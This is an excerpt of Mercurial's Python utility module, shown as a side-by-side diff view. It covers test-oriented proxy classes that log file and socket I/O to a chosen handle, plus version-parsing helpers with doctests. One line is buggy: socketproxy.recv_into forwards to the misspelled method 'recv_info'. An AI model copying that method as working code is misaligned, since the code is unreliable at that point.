481 return delattr(object.__getattribute__(self, r'_orig'), name)
482
482
483 def __setattr__(self, name, value):
483 def __setattr__(self, name, value):
484 return setattr(object.__getattribute__(self, r'_orig'), name, value)
484 return setattr(object.__getattribute__(self, r'_orig'), name, value)
485
485
486 def __iter__(self):
486 def __iter__(self):
487 return object.__getattribute__(self, r'_orig').__iter__()
487 return object.__getattribute__(self, r'_orig').__iter__()
488
488
489 def _observedcall(self, name, *args, **kwargs):
489 def _observedcall(self, name, *args, **kwargs):
490 # Call the original object.
490 # Call the original object.
491 orig = object.__getattribute__(self, r'_orig')
491 orig = object.__getattribute__(self, r'_orig')
492 res = getattr(orig, name)(*args, **kwargs)
492 res = getattr(orig, name)(*args, **kwargs)
493
493
494 # Call a method on the observer of the same name with arguments
494 # Call a method on the observer of the same name with arguments
495 # so it can react, log, etc.
495 # so it can react, log, etc.
496 observer = object.__getattribute__(self, r'_observer')
496 observer = object.__getattribute__(self, r'_observer')
497 fn = getattr(observer, name, None)
497 fn = getattr(observer, name, None)
498 if fn:
498 if fn:
499 fn(res, *args, **kwargs)
499 fn(res, *args, **kwargs)
500
500
501 return res
501 return res
502
502
503 def close(self, *args, **kwargs):
503 def close(self, *args, **kwargs):
504 return object.__getattribute__(self, r'_observedcall')(
504 return object.__getattribute__(self, r'_observedcall')(
505 r'close', *args, **kwargs)
505 r'close', *args, **kwargs)
506
506
507 def fileno(self, *args, **kwargs):
507 def fileno(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
508 return object.__getattribute__(self, r'_observedcall')(
509 r'fileno', *args, **kwargs)
509 r'fileno', *args, **kwargs)
510
510
511 def flush(self, *args, **kwargs):
511 def flush(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
512 return object.__getattribute__(self, r'_observedcall')(
513 r'flush', *args, **kwargs)
513 r'flush', *args, **kwargs)
514
514
515 def isatty(self, *args, **kwargs):
515 def isatty(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
516 return object.__getattribute__(self, r'_observedcall')(
517 r'isatty', *args, **kwargs)
517 r'isatty', *args, **kwargs)
518
518
519 def readable(self, *args, **kwargs):
519 def readable(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
520 return object.__getattribute__(self, r'_observedcall')(
521 r'readable', *args, **kwargs)
521 r'readable', *args, **kwargs)
522
522
523 def readline(self, *args, **kwargs):
523 def readline(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
524 return object.__getattribute__(self, r'_observedcall')(
525 r'readline', *args, **kwargs)
525 r'readline', *args, **kwargs)
526
526
527 def readlines(self, *args, **kwargs):
527 def readlines(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
528 return object.__getattribute__(self, r'_observedcall')(
529 r'readlines', *args, **kwargs)
529 r'readlines', *args, **kwargs)
530
530
531 def seek(self, *args, **kwargs):
531 def seek(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
532 return object.__getattribute__(self, r'_observedcall')(
533 r'seek', *args, **kwargs)
533 r'seek', *args, **kwargs)
534
534
535 def seekable(self, *args, **kwargs):
535 def seekable(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
536 return object.__getattribute__(self, r'_observedcall')(
537 r'seekable', *args, **kwargs)
537 r'seekable', *args, **kwargs)
538
538
539 def tell(self, *args, **kwargs):
539 def tell(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
540 return object.__getattribute__(self, r'_observedcall')(
541 r'tell', *args, **kwargs)
541 r'tell', *args, **kwargs)
542
542
543 def truncate(self, *args, **kwargs):
543 def truncate(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
544 return object.__getattribute__(self, r'_observedcall')(
545 r'truncate', *args, **kwargs)
545 r'truncate', *args, **kwargs)
546
546
547 def writable(self, *args, **kwargs):
547 def writable(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
548 return object.__getattribute__(self, r'_observedcall')(
549 r'writable', *args, **kwargs)
549 r'writable', *args, **kwargs)
550
550
551 def writelines(self, *args, **kwargs):
551 def writelines(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
552 return object.__getattribute__(self, r'_observedcall')(
553 r'writelines', *args, **kwargs)
553 r'writelines', *args, **kwargs)
554
554
555 def read(self, *args, **kwargs):
555 def read(self, *args, **kwargs):
556 return object.__getattribute__(self, r'_observedcall')(
556 return object.__getattribute__(self, r'_observedcall')(
557 r'read', *args, **kwargs)
557 r'read', *args, **kwargs)
558
558
559 def readall(self, *args, **kwargs):
559 def readall(self, *args, **kwargs):
560 return object.__getattribute__(self, r'_observedcall')(
560 return object.__getattribute__(self, r'_observedcall')(
561 r'readall', *args, **kwargs)
561 r'readall', *args, **kwargs)
562
562
563 def readinto(self, *args, **kwargs):
563 def readinto(self, *args, **kwargs):
564 return object.__getattribute__(self, r'_observedcall')(
564 return object.__getattribute__(self, r'_observedcall')(
565 r'readinto', *args, **kwargs)
565 r'readinto', *args, **kwargs)
566
566
567 def write(self, *args, **kwargs):
567 def write(self, *args, **kwargs):
568 return object.__getattribute__(self, r'_observedcall')(
568 return object.__getattribute__(self, r'_observedcall')(
569 r'write', *args, **kwargs)
569 r'write', *args, **kwargs)
570
570
571 def detach(self, *args, **kwargs):
571 def detach(self, *args, **kwargs):
572 return object.__getattribute__(self, r'_observedcall')(
572 return object.__getattribute__(self, r'_observedcall')(
573 r'detach', *args, **kwargs)
573 r'detach', *args, **kwargs)
574
574
575 def read1(self, *args, **kwargs):
575 def read1(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
577 r'read1', *args, **kwargs)
577 r'read1', *args, **kwargs)
578
578
579 class observedbufferedinputpipe(bufferedinputpipe):
579 class observedbufferedinputpipe(bufferedinputpipe):
580 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
580 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
581
581
582 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
582 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
583 bypass ``fileobjectproxy``. Because of this, we need to make
583 bypass ``fileobjectproxy``. Because of this, we need to make
584 ``bufferedinputpipe`` aware of these operations.
584 ``bufferedinputpipe`` aware of these operations.
585
585
586 This variation of ``bufferedinputpipe`` can notify observers about
586 This variation of ``bufferedinputpipe`` can notify observers about
587 ``os.read()`` events. It also re-publishes other events, such as
587 ``os.read()`` events. It also re-publishes other events, such as
588 ``read()`` and ``readline()``.
588 ``read()`` and ``readline()``.
589 """
589 """
590 def _fillbuffer(self):
590 def _fillbuffer(self):
591 res = super(observedbufferedinputpipe, self)._fillbuffer()
591 res = super(observedbufferedinputpipe, self)._fillbuffer()
592
592
593 fn = getattr(self._input._observer, r'osread', None)
593 fn = getattr(self._input._observer, r'osread', None)
594 if fn:
594 if fn:
595 fn(res, _chunksize)
595 fn(res, _chunksize)
596
596
597 return res
597 return res
598
598
599 # We use different observer methods because the operation isn't
599 # We use different observer methods because the operation isn't
600 # performed on the actual file object but on us.
600 # performed on the actual file object but on us.
601 def read(self, size):
601 def read(self, size):
602 res = super(observedbufferedinputpipe, self).read(size)
602 res = super(observedbufferedinputpipe, self).read(size)
603
603
604 fn = getattr(self._input._observer, r'bufferedread', None)
604 fn = getattr(self._input._observer, r'bufferedread', None)
605 if fn:
605 if fn:
606 fn(res, size)
606 fn(res, size)
607
607
608 return res
608 return res
609
609
610 def readline(self, *args, **kwargs):
610 def readline(self, *args, **kwargs):
611 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
611 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
612
612
613 fn = getattr(self._input._observer, r'bufferedreadline', None)
613 fn = getattr(self._input._observer, r'bufferedreadline', None)
614 if fn:
614 if fn:
615 fn(res)
615 fn(res)
616
616
617 return res
617 return res
618
618
619 PROXIED_SOCKET_METHODS = {
619 PROXIED_SOCKET_METHODS = {
620 r'makefile',
620 r'makefile',
621 r'recv',
621 r'recv',
622 r'recvfrom',
622 r'recvfrom',
623 r'recvfrom_into',
623 r'recvfrom_into',
624 r'recv_into',
624 r'recv_into',
625 r'send',
625 r'send',
626 r'sendall',
626 r'sendall',
627 r'sendto',
627 r'sendto',
628 r'setblocking',
628 r'setblocking',
629 r'settimeout',
629 r'settimeout',
630 r'gettimeout',
630 r'gettimeout',
631 r'setsockopt',
631 r'setsockopt',
632 }
632 }
633
633
634 class socketproxy(object):
634 class socketproxy(object):
635 """A proxy around a socket that tells a watcher when events occur.
635 """A proxy around a socket that tells a watcher when events occur.
636
636
637 This is like ``fileobjectproxy`` except for sockets.
637 This is like ``fileobjectproxy`` except for sockets.
638
638
639 This type is intended to only be used for testing purposes. Think hard
639 This type is intended to only be used for testing purposes. Think hard
640 before using it in important code.
640 before using it in important code.
641 """
641 """
642 __slots__ = (
642 __slots__ = (
643 r'_orig',
643 r'_orig',
644 r'_observer',
644 r'_observer',
645 )
645 )
646
646
647 def __init__(self, sock, observer):
647 def __init__(self, sock, observer):
648 object.__setattr__(self, r'_orig', sock)
648 object.__setattr__(self, r'_orig', sock)
649 object.__setattr__(self, r'_observer', observer)
649 object.__setattr__(self, r'_observer', observer)
650
650
651 def __getattribute__(self, name):
651 def __getattribute__(self, name):
652 if name in PROXIED_SOCKET_METHODS:
652 if name in PROXIED_SOCKET_METHODS:
653 return object.__getattribute__(self, name)
653 return object.__getattribute__(self, name)
654
654
655 return getattr(object.__getattribute__(self, r'_orig'), name)
655 return getattr(object.__getattribute__(self, r'_orig'), name)
656
656
657 def __delattr__(self, name):
657 def __delattr__(self, name):
658 return delattr(object.__getattribute__(self, r'_orig'), name)
658 return delattr(object.__getattribute__(self, r'_orig'), name)
659
659
660 def __setattr__(self, name, value):
660 def __setattr__(self, name, value):
661 return setattr(object.__getattribute__(self, r'_orig'), name, value)
661 return setattr(object.__getattribute__(self, r'_orig'), name, value)
662
662
663 def __nonzero__(self):
663 def __nonzero__(self):
664 return bool(object.__getattribute__(self, r'_orig'))
664 return bool(object.__getattribute__(self, r'_orig'))
665
665
666 __bool__ = __nonzero__
666 __bool__ = __nonzero__
667
667
668 def _observedcall(self, name, *args, **kwargs):
668 def _observedcall(self, name, *args, **kwargs):
669 # Call the original object.
669 # Call the original object.
670 orig = object.__getattribute__(self, r'_orig')
670 orig = object.__getattribute__(self, r'_orig')
671 res = getattr(orig, name)(*args, **kwargs)
671 res = getattr(orig, name)(*args, **kwargs)
672
672
673 # Call a method on the observer of the same name with arguments
673 # Call a method on the observer of the same name with arguments
674 # so it can react, log, etc.
674 # so it can react, log, etc.
675 observer = object.__getattribute__(self, r'_observer')
675 observer = object.__getattribute__(self, r'_observer')
676 fn = getattr(observer, name, None)
676 fn = getattr(observer, name, None)
677 if fn:
677 if fn:
678 fn(res, *args, **kwargs)
678 fn(res, *args, **kwargs)
679
679
680 return res
680 return res
681
681
682 def makefile(self, *args, **kwargs):
682 def makefile(self, *args, **kwargs):
683 res = object.__getattribute__(self, r'_observedcall')(
683 res = object.__getattribute__(self, r'_observedcall')(
684 r'makefile', *args, **kwargs)
684 r'makefile', *args, **kwargs)
685
685
686 # The file object may be used for I/O. So we turn it into a
686 # The file object may be used for I/O. So we turn it into a
687 # proxy using our observer.
687 # proxy using our observer.
688 observer = object.__getattribute__(self, r'_observer')
688 observer = object.__getattribute__(self, r'_observer')
689 return makeloggingfileobject(observer.fh, res, observer.name,
689 return makeloggingfileobject(observer.fh, res, observer.name,
690 reads=observer.reads,
690 reads=observer.reads,
691 writes=observer.writes,
691 writes=observer.writes,
692 logdata=observer.logdata,
692 logdata=observer.logdata,
693 logdataapis=observer.logdataapis)
693 logdataapis=observer.logdataapis)
694
694
695 def recv(self, *args, **kwargs):
695 def recv(self, *args, **kwargs):
696 return object.__getattribute__(self, r'_observedcall')(
696 return object.__getattribute__(self, r'_observedcall')(
697 r'recv', *args, **kwargs)
697 r'recv', *args, **kwargs)
698
698
699 def recvfrom(self, *args, **kwargs):
699 def recvfrom(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
700 return object.__getattribute__(self, r'_observedcall')(
701 r'recvfrom', *args, **kwargs)
701 r'recvfrom', *args, **kwargs)
702
702
703 def recvfrom_into(self, *args, **kwargs):
703 def recvfrom_into(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
704 return object.__getattribute__(self, r'_observedcall')(
705 r'recvfrom_into', *args, **kwargs)
705 r'recvfrom_into', *args, **kwargs)
706
706
707 def recv_into(self, *args, **kwargs):
707 def recv_into(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
708 return object.__getattribute__(self, r'_observedcall')(
709 r'recv_info', *args, **kwargs)
709 r'recv_info', *args, **kwargs)
710
710
711 def send(self, *args, **kwargs):
711 def send(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
712 return object.__getattribute__(self, r'_observedcall')(
713 r'send', *args, **kwargs)
713 r'send', *args, **kwargs)
714
714
715 def sendall(self, *args, **kwargs):
715 def sendall(self, *args, **kwargs):
716 return object.__getattribute__(self, r'_observedcall')(
716 return object.__getattribute__(self, r'_observedcall')(
717 r'sendall', *args, **kwargs)
717 r'sendall', *args, **kwargs)
718
718
719 def sendto(self, *args, **kwargs):
719 def sendto(self, *args, **kwargs):
720 return object.__getattribute__(self, r'_observedcall')(
720 return object.__getattribute__(self, r'_observedcall')(
721 r'sendto', *args, **kwargs)
721 r'sendto', *args, **kwargs)
722
722
723 def setblocking(self, *args, **kwargs):
723 def setblocking(self, *args, **kwargs):
724 return object.__getattribute__(self, r'_observedcall')(
724 return object.__getattribute__(self, r'_observedcall')(
725 r'setblocking', *args, **kwargs)
725 r'setblocking', *args, **kwargs)
726
726
727 def settimeout(self, *args, **kwargs):
727 def settimeout(self, *args, **kwargs):
728 return object.__getattribute__(self, r'_observedcall')(
728 return object.__getattribute__(self, r'_observedcall')(
729 r'settimeout', *args, **kwargs)
729 r'settimeout', *args, **kwargs)
730
730
731 def gettimeout(self, *args, **kwargs):
731 def gettimeout(self, *args, **kwargs):
732 return object.__getattribute__(self, r'_observedcall')(
732 return object.__getattribute__(self, r'_observedcall')(
733 r'gettimeout', *args, **kwargs)
733 r'gettimeout', *args, **kwargs)
734
734
735 def setsockopt(self, *args, **kwargs):
735 def setsockopt(self, *args, **kwargs):
736 return object.__getattribute__(self, r'_observedcall')(
736 return object.__getattribute__(self, r'_observedcall')(
737 r'setsockopt', *args, **kwargs)
737 r'setsockopt', *args, **kwargs)
738
738
739 class baseproxyobserver(object):
739 class baseproxyobserver(object):
740 def _writedata(self, data):
740 def _writedata(self, data):
741 if not self.logdata:
741 if not self.logdata:
742 if self.logdataapis:
742 if self.logdataapis:
743 self.fh.write('\n')
743 self.fh.write('\n')
744 self.fh.flush()
744 self.fh.flush()
745 return
745 return
746
746
747 # Simple case writes all data on a single line.
747 # Simple case writes all data on a single line.
748 if b'\n' not in data:
748 if b'\n' not in data:
749 if self.logdataapis:
749 if self.logdataapis:
750 self.fh.write(': %s\n' % stringutil.escapestr(data))
750 self.fh.write(': %s\n' % stringutil.escapestr(data))
751 else:
751 else:
752 self.fh.write('%s> %s\n'
752 self.fh.write('%s> %s\n'
753 % (self.name, stringutil.escapestr(data)))
753 % (self.name, stringutil.escapestr(data)))
754 self.fh.flush()
754 self.fh.flush()
755 return
755 return
756
756
757 # Data with newlines is written to multiple lines.
757 # Data with newlines is written to multiple lines.
758 if self.logdataapis:
758 if self.logdataapis:
759 self.fh.write(':\n')
759 self.fh.write(':\n')
760
760
761 lines = data.splitlines(True)
761 lines = data.splitlines(True)
762 for line in lines:
762 for line in lines:
763 self.fh.write('%s> %s\n'
763 self.fh.write('%s> %s\n'
764 % (self.name, stringutil.escapestr(line)))
764 % (self.name, stringutil.escapestr(line)))
765 self.fh.flush()
765 self.fh.flush()
766
766
767 class fileobjectobserver(baseproxyobserver):
767 class fileobjectobserver(baseproxyobserver):
768 """Logs file object activity."""
768 """Logs file object activity."""
769 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
769 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
770 logdataapis=True):
770 logdataapis=True):
771 self.fh = fh
771 self.fh = fh
772 self.name = name
772 self.name = name
773 self.logdata = logdata
773 self.logdata = logdata
774 self.logdataapis = logdataapis
774 self.logdataapis = logdataapis
775 self.reads = reads
775 self.reads = reads
776 self.writes = writes
776 self.writes = writes
777
777
778 def read(self, res, size=-1):
778 def read(self, res, size=-1):
779 if not self.reads:
779 if not self.reads:
780 return
780 return
781 # Python 3 can return None from reads at EOF instead of empty strings.
781 # Python 3 can return None from reads at EOF instead of empty strings.
782 if res is None:
782 if res is None:
783 res = ''
783 res = ''
784
784
785 if size == -1 and res == '':
785 if size == -1 and res == '':
786 # Suppress pointless read(-1) calls that return
786 # Suppress pointless read(-1) calls that return
787 # nothing. These happen _a lot_ on Python 3, and there
787 # nothing. These happen _a lot_ on Python 3, and there
788 # doesn't seem to be a better workaround to have matching
788 # doesn't seem to be a better workaround to have matching
789 # Python 2 and 3 behavior. :(
789 # Python 2 and 3 behavior. :(
790 return
790 return
791
791
792 if self.logdataapis:
792 if self.logdataapis:
793 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
793 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
794
794
795 self._writedata(res)
795 self._writedata(res)
796
796
797 def readline(self, res, limit=-1):
797 def readline(self, res, limit=-1):
798 if not self.reads:
798 if not self.reads:
799 return
799 return
800
800
801 if self.logdataapis:
801 if self.logdataapis:
802 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
802 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
803
803
804 self._writedata(res)
804 self._writedata(res)
805
805
806 def readinto(self, res, dest):
806 def readinto(self, res, dest):
807 if not self.reads:
807 if not self.reads:
808 return
808 return
809
809
810 if self.logdataapis:
810 if self.logdataapis:
811 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
811 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
812 res))
812 res))
813
813
814 data = dest[0:res] if res is not None else b''
814 data = dest[0:res] if res is not None else b''
815 self._writedata(data)
815 self._writedata(data)
816
816
817 def write(self, res, data):
817 def write(self, res, data):
818 if not self.writes:
818 if not self.writes:
819 return
819 return
820
820
821 # Python 2 returns None from some write() calls. Python 3 (reasonably)
821 # Python 2 returns None from some write() calls. Python 3 (reasonably)
822 # returns the integer bytes written.
822 # returns the integer bytes written.
823 if res is None and data:
823 if res is None and data:
824 res = len(data)
824 res = len(data)
825
825
826 if self.logdataapis:
826 if self.logdataapis:
827 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
827 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
828
828
829 self._writedata(data)
829 self._writedata(data)
830
830
831 def flush(self, res):
831 def flush(self, res):
832 if not self.writes:
832 if not self.writes:
833 return
833 return
834
834
835 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
835 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
836
836
837 # For observedbufferedinputpipe.
837 # For observedbufferedinputpipe.
838 def bufferedread(self, res, size):
838 def bufferedread(self, res, size):
839 if not self.reads:
839 if not self.reads:
840 return
840 return
841
841
842 if self.logdataapis:
842 if self.logdataapis:
843 self.fh.write('%s> bufferedread(%d) -> %d' % (
843 self.fh.write('%s> bufferedread(%d) -> %d' % (
844 self.name, size, len(res)))
844 self.name, size, len(res)))
845
845
846 self._writedata(res)
846 self._writedata(res)
847
847
848 def bufferedreadline(self, res):
848 def bufferedreadline(self, res):
849 if not self.reads:
849 if not self.reads:
850 return
850 return
851
851
852 if self.logdataapis:
852 if self.logdataapis:
853 self.fh.write('%s> bufferedreadline() -> %d' % (
853 self.fh.write('%s> bufferedreadline() -> %d' % (
854 self.name, len(res)))
854 self.name, len(res)))
855
855
856 self._writedata(res)
856 self._writedata(res)
857
857
858 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
858 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
859 logdata=False, logdataapis=True):
859 logdata=False, logdataapis=True):
860 """Turn a file object into a logging file object."""
860 """Turn a file object into a logging file object."""
861
861
862 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
862 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
863 logdata=logdata, logdataapis=logdataapis)
863 logdata=logdata, logdataapis=logdataapis)
864 return fileobjectproxy(fh, observer)
864 return fileobjectproxy(fh, observer)
865
865
866 class socketobserver(baseproxyobserver):
866 class socketobserver(baseproxyobserver):
867 """Logs socket activity."""
867 """Logs socket activity."""
868 def __init__(self, fh, name, reads=True, writes=True, states=True,
868 def __init__(self, fh, name, reads=True, writes=True, states=True,
869 logdata=False, logdataapis=True):
869 logdata=False, logdataapis=True):
870 self.fh = fh
870 self.fh = fh
871 self.name = name
871 self.name = name
872 self.reads = reads
872 self.reads = reads
873 self.writes = writes
873 self.writes = writes
874 self.states = states
874 self.states = states
875 self.logdata = logdata
875 self.logdata = logdata
876 self.logdataapis = logdataapis
876 self.logdataapis = logdataapis
877
877
878 def makefile(self, res, mode=None, bufsize=None):
878 def makefile(self, res, mode=None, bufsize=None):
879 if not self.states:
879 if not self.states:
880 return
880 return
881
881
882 self.fh.write('%s> makefile(%r, %r)\n' % (
882 self.fh.write('%s> makefile(%r, %r)\n' % (
883 self.name, mode, bufsize))
883 self.name, mode, bufsize))
884
884
885 def recv(self, res, size, flags=0):
885 def recv(self, res, size, flags=0):
886 if not self.reads:
886 if not self.reads:
887 return
887 return
888
888
889 if self.logdataapis:
889 if self.logdataapis:
890 self.fh.write('%s> recv(%d, %d) -> %d' % (
890 self.fh.write('%s> recv(%d, %d) -> %d' % (
891 self.name, size, flags, len(res)))
891 self.name, size, flags, len(res)))
892 self._writedata(res)
892 self._writedata(res)
893
893
894 def recvfrom(self, res, size, flags=0):
894 def recvfrom(self, res, size, flags=0):
895 if not self.reads:
895 if not self.reads:
896 return
896 return
897
897
898 if self.logdataapis:
898 if self.logdataapis:
899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
900 self.name, size, flags, len(res[0])))
900 self.name, size, flags, len(res[0])))
901
901
902 self._writedata(res[0])
902 self._writedata(res[0])
903
903
904 def recvfrom_into(self, res, buf, size, flags=0):
904 def recvfrom_into(self, res, buf, size, flags=0):
905 if not self.reads:
905 if not self.reads:
906 return
906 return
907
907
908 if self.logdataapis:
908 if self.logdataapis:
909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
910 self.name, size, flags, res[0]))
910 self.name, size, flags, res[0]))
911
911
912 self._writedata(buf[0:res[0]])
912 self._writedata(buf[0:res[0]])
913
913
914 def recv_into(self, res, buf, size=0, flags=0):
914 def recv_into(self, res, buf, size=0, flags=0):
915 if not self.reads:
915 if not self.reads:
916 return
916 return
917
917
918 if self.logdataapis:
918 if self.logdataapis:
919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
920 self.name, size, flags, res))
920 self.name, size, flags, res))
921
921
922 self._writedata(buf[0:res])
922 self._writedata(buf[0:res])
923
923
924 def send(self, res, data, flags=0):
924 def send(self, res, data, flags=0):
925 if not self.writes:
925 if not self.writes:
926 return
926 return
927
927
928 self.fh.write('%s> send(%d, %d) -> %d' % (
928 self.fh.write('%s> send(%d, %d) -> %d' % (
929 self.name, len(data), flags, len(res)))
929 self.name, len(data), flags, len(res)))
930 self._writedata(data)
930 self._writedata(data)
931
931
932 def sendall(self, res, data, flags=0):
932 def sendall(self, res, data, flags=0):
933 if not self.writes:
933 if not self.writes:
934 return
934 return
935
935
936 if self.logdataapis:
936 if self.logdataapis:
937 # Returns None on success. So don't bother reporting return value.
937 # Returns None on success. So don't bother reporting return value.
938 self.fh.write('%s> sendall(%d, %d)' % (
938 self.fh.write('%s> sendall(%d, %d)' % (
939 self.name, len(data), flags))
939 self.name, len(data), flags))
940
940
941 self._writedata(data)
941 self._writedata(data)
942
942
943 def sendto(self, res, data, flagsoraddress, address=None):
943 def sendto(self, res, data, flagsoraddress, address=None):
944 if not self.writes:
944 if not self.writes:
945 return
945 return
946
946
947 if address:
947 if address:
948 flags = flagsoraddress
948 flags = flagsoraddress
949 else:
949 else:
950 flags = 0
950 flags = 0
951
951
952 if self.logdataapis:
952 if self.logdataapis:
953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
954 self.name, len(data), flags, address, res))
954 self.name, len(data), flags, address, res))
955
955
956 self._writedata(data)
956 self._writedata(data)
957
957
958 def setblocking(self, res, flag):
958 def setblocking(self, res, flag):
959 if not self.states:
959 if not self.states:
960 return
960 return
961
961
962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
963
963
964 def settimeout(self, res, value):
964 def settimeout(self, res, value):
965 if not self.states:
965 if not self.states:
966 return
966 return
967
967
968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
969
969
970 def gettimeout(self, res):
970 def gettimeout(self, res):
971 if not self.states:
971 if not self.states:
972 return
972 return
973
973
974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
975
975
976 def setsockopt(self, level, optname, value):
976 def setsockopt(self, level, optname, value):
977 if not self.states:
977 if not self.states:
978 return
978 return
979
979
980 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
980 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
981 self.name, level, optname, value))
981 self.name, level, optname, value))
982
982
983 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
983 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
984 logdata=False, logdataapis=True):
984 logdata=False, logdataapis=True):
985 """Turn a socket into a logging socket."""
985 """Turn a socket into a logging socket."""
986
986
987 observer = socketobserver(logh, name, reads=reads, writes=writes,
987 observer = socketobserver(logh, name, reads=reads, writes=writes,
988 states=states, logdata=logdata,
988 states=states, logdata=logdata,
989 logdataapis=logdataapis)
989 logdataapis=logdataapis)
990 return socketproxy(fh, observer)
990 return socketproxy(fh, observer)
991
991
992 def version():
992 def version():
993 """Return version information if available."""
993 """Return version information if available."""
994 try:
994 try:
995 from . import __version__
995 from . import __version__
996 return __version__.version
996 return __version__.version
997 except ImportError:
997 except ImportError:
998 return 'unknown'
998 return 'unknown'
999
999
1000 def versiontuple(v=None, n=4):
1000 def versiontuple(v=None, n=4):
1001 """Parses a Mercurial version string into an N-tuple.
1001 """Parses a Mercurial version string into an N-tuple.
1002
1002
1003 The version string to be parsed is specified with the ``v`` argument.
1003 The version string to be parsed is specified with the ``v`` argument.
1004 If it isn't defined, the current Mercurial version string will be parsed.
1004 If it isn't defined, the current Mercurial version string will be parsed.
1005
1005
1006 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1006 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1007 returned values:
1007 returned values:
1008
1008
1009 >>> v = b'3.6.1+190-df9b73d2d444'
1009 >>> v = b'3.6.1+190-df9b73d2d444'
1010 >>> versiontuple(v, 2)
1010 >>> versiontuple(v, 2)
1011 (3, 6)
1011 (3, 6)
1012 >>> versiontuple(v, 3)
1012 >>> versiontuple(v, 3)
1013 (3, 6, 1)
1013 (3, 6, 1)
1014 >>> versiontuple(v, 4)
1014 >>> versiontuple(v, 4)
1015 (3, 6, 1, '190-df9b73d2d444')
1015 (3, 6, 1, '190-df9b73d2d444')
1016
1016
1017 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1017 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1018 (3, 6, 1, '190-df9b73d2d444+20151118')
1018 (3, 6, 1, '190-df9b73d2d444+20151118')
1019
1019
1020 >>> v = b'3.6'
1020 >>> v = b'3.6'
1021 >>> versiontuple(v, 2)
1021 >>> versiontuple(v, 2)
1022 (3, 6)
1022 (3, 6)
1023 >>> versiontuple(v, 3)
1023 >>> versiontuple(v, 3)
1024 (3, 6, None)
1024 (3, 6, None)
1025 >>> versiontuple(v, 4)
1025 >>> versiontuple(v, 4)
1026 (3, 6, None, None)
1026 (3, 6, None, None)
1027
1027
1028 >>> v = b'3.9-rc'
1028 >>> v = b'3.9-rc'
1029 >>> versiontuple(v, 2)
1029 >>> versiontuple(v, 2)
1030 (3, 9)
1030 (3, 9)
1031 >>> versiontuple(v, 3)
1031 >>> versiontuple(v, 3)
1032 (3, 9, None)
1032 (3, 9, None)
1033 >>> versiontuple(v, 4)
1033 >>> versiontuple(v, 4)
1034 (3, 9, None, 'rc')
1034 (3, 9, None, 'rc')
1035
1035
1036 >>> v = b'3.9-rc+2-02a8fea4289b'
1036 >>> v = b'3.9-rc+2-02a8fea4289b'
1037 >>> versiontuple(v, 2)
1037 >>> versiontuple(v, 2)
1038 (3, 9)
1038 (3, 9)
1039 >>> versiontuple(v, 3)
1039 >>> versiontuple(v, 3)
1040 (3, 9, None)
1040 (3, 9, None)
1041 >>> versiontuple(v, 4)
1041 >>> versiontuple(v, 4)
1042 (3, 9, None, 'rc+2-02a8fea4289b')
1042 (3, 9, None, 'rc+2-02a8fea4289b')
1043
1043
1044 >>> versiontuple(b'4.6rc0')
1044 >>> versiontuple(b'4.6rc0')
